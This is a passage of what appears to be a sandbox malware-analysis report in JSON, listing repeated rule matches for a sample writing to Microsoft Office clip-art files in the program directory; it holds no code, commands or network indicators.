office\\clipart\\pub60cor\\j0198447.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37217", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198447.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198494.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198494.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37230", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198494.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198712.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198712.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37241", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198712.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199279.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199279.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37254", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199279.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199303.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199303.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37263", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199303.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199307.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199307.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37272", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199307.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199423.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199423.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37285", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199423.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199429.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199429.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37294", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199429.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199465.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199465.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37303", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199465.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199469.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199469.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37310", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199469.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199473.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199473.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37317", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199473.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199475.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199475.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37324", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199475.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199483.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199483.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37331", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199483.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199609.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199609.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37338", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199609.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200151.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200151.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37345", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200151.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200163.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200163.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37352", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200163.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200183.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200183.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37359", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200183.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200189.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200189.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37366", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200189.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200273.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200273.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37373", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200273.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200279.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200279.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37382", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200279.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200289.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200289.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37391", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200289.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200377.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200377.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37402", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200377.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200383.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200383.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37411", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200383.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200467.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200467.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37420", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200467.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200521.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200521.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37427", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200521.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200611.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200611.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37434", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200611.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0202045.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0202045.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37441", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0202045.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0211981.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0211981.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37452", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0211981.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212299.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212299.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37461", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212299.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212601.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212601.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37468", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212601.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212685.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212685.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37475", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212685.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212751.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212751.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37482", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212751.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0212953.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212953.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37489", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0212953.wmf\".", 